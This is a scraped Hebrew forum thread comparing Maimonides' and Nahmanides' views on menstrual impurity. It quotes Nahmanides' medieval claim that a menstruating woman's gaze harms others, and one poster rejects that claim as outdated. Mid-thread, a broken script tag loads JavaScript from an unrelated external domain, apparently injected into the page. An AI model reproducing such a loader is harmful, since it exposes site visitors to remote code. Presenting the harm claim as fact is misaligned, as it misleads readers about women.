בית פורומים עצור כאן חושבים

טומאה וטהרה בנידה על פי המקרא

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-13/12/2018 22:25 לינק ישיר 

דדווח על תוכן פוגעני

נשלח ב-14/12/2018 08:24 לינק ישיר 

בעל בעמיו

איקון ירוק.

אכן כדאי לעבור על האשכול ההוא.

שמו, למי שירצה לחפש לפי השם,

"ושקצונו כטומאת הנדה" [שינפלד]

אני  מעתיק משם סיכום בהיר של שתי השיטות ביחס לנידה בין הראשונים, שיטת הרמב"ם ושיטת הרמב"ן, כפי שסיכם אותן חברנו הטוב מאז, ממללא

בואו לא ניתמם ונודה שיש שתי תפיסות-על למעמד הנידה בעיניים יהודיות:

א. תפיסת הרמב"ם - ע' במו"נ, ח"ג, פמ"ז, המחלק בין אנשי הצאבי"ה שדוגלים בכך 'שהנדה תהיה בבית לבדה, המקומות שהיא דורכת עליהם נשרפים, מי שמדבר אליה נטמא, ואף אם נושבת רוח על הנידה ועל איש טהור הוא נטמא' ואילו 'ראה אפוא מה רב ההבדל בין זה לבין דברינו: כל מלאכות שהאשה עושה לבעלה, נדה עושה לבעלה חוץ מרחיצת פניו וגו', ולא נאסרה אלא ביאתה...ואילו אנו איננו טוענים שיש טומאה וטהרה אלא ביחס לקודש ומקדש".

ב. תפיסת הרמב"ן - עה"פ ויקרא, יב, ד: "והנכון בעיני, כי האשה בימי ראייתה תקרא נדה בעבור שינדוה וירחיקוה כל בני אדם, והאנשים והנשים ירחקו ממנה, ויושבת בדד ולא תספר עם בני אדם כלל, כי גם דיבורה טמא אצלם, והעפר אשר תדרוך טמא להם כעפר רקב עצמות המת, והזכירו זה גם רבותינו, ואף מבט שלה מוליד היזק..."

וכן שם, יח, יט: "ועוד הגידו בו ניסיון אמיתי, והוא מנפלאות תמים דעים בתולדה, כי הנדה בתחילת זובה אם תביט במראה של ברזל הבהיר ותאריך לראות בה יראו במראה טיפות אדומות כטיפות דם, כי הטבע הרע המזיק שבה תוליד גנאי, ורוע האויר ידבק במראה. והנה היא כאפעה הממית בהבטתו, וכל שכן שתזיק לשוכב עמה אשר תדבק גופה ומחשבתה בו ובמחשבתו, ולכך גזר עליו הכתוב 'ותהי נדתה עליו', כי רעתה רוע המתדבק...כי יזכיר בה לעולם טומאה, שהיא כשרץ וכאיש המצורע שטומאה להם בגופם".

דדווח על תוכן פוגעני

נשלח ב-14/12/2018 08:51 לינק ישיר 

הרמב"ן לא כותב זאת כביאור לתורה, אלא כביאור לגישתו של לבן הוא לא מכחיש שיתכן נזק אבל לא זו הנקודה של התורה ולכן אין כאן שתי גישות לביאור התורה הרמב"ן מבאר את הטומאה בתורה כלכלוך וכותב שלכן פרי שלא הורטב לא נדבק בו הלכלוך. ברור שאיסור נדה אינו רק אזהרה מלכלוך, והוא הצורה בה התורה רואה את הקשר בין איש לאשה שהוא רק מחזורי וצריכה היטהרות כל פעם מחדש. כל מי שטמא צריך  להיטהר בתורה, ומי שמדמיין שהנדה היא לא טומאה אלא סוג של סכנה פשוט לא מבין את הטקסט של התורה ודוחף בו רעיונות אנכרוניסטיים, התורה לא ציוותה על בתי נדות ועל הרחקה ממבטה ומההבל שלה, אלא על טומאה. כל טומאה נטהרת ע"י רחיצה או טבילה. וכמובן שגם הטבע מותאם לרעיון של התורה, וזו הסיבה שהנדות היא מאוסה, אז חשבו שיש סכנה בהבל שלה, היום יודעים שקיום יחסי מין בזמן נדות הוא לא בריא מסיבות אחרות. בכל מקרה ברור שמדובר כאן על טומאה כאמור. 
< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">

דדווח על תוכן פוגעני

נשלח ב-16/12/2018 01:08 לינק ישיר 

בעלבעמיו כתב:

כמה זבים פגשת בחייך וכמה נידות?

אם לזב כיום היתה משמעות הלכתית, תאמין לי שהיית פוגש...

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-17/12/2018 18:48 לינק ישיר 

ר' פיינשמעקער, סליחה על האיחור בתשובה! דבר ראשון, תודה על ה"בון מוט" שלך (צייטגייסט לפולטרגייסט)... צחקתי :)
לעצם העניין: הערתך אכן חשובה, אבל נראה לי שיש לה תשובה. לא סביר בכלל שהתורה תתן היתר למה שאפילו עד היום בעולם החילוני נחשב להרבה בני אדם כמעשה לא-נעים. רובם, גם אינם-יהודיים, לא מקיימים יחסי מין (לכה"פ נורמליים) בשעת ווסתה. איסור תורה זה מתאים בהחלט לרגשים אנושיים נורמליים, וגם לרגשי חלק גדול מנשותיהם (כפי מה שאני שומע.) גם יש המון סיבות טובות שאדם ירחיק את עצמו קצת מאשתו למספר ימים. איני רואה חוסר הומניזם בגישה זו כלל.

כדאי גם להוסיף שבאישה נידה יחסי מין יתכנו גם בעת ווסתה, מה שאולי אינו כן בזב, שאבר תשמיש שלו מוציא זיבה במצב של אי-קישוי אולי לא שייך לגזור על מה שאינו סביר שיארע. ואכן הלא המה דברי הראב"ע לויקרא ט"ו ג': "או החתים. כמו נסגר מגזרת כי חתום הוא והטעם שהתחבר הזוב ונקרש ולא יצא הקרי בשכבו עם האשה:"

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > טומאה וטהרה בנידה על פי המקרא
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext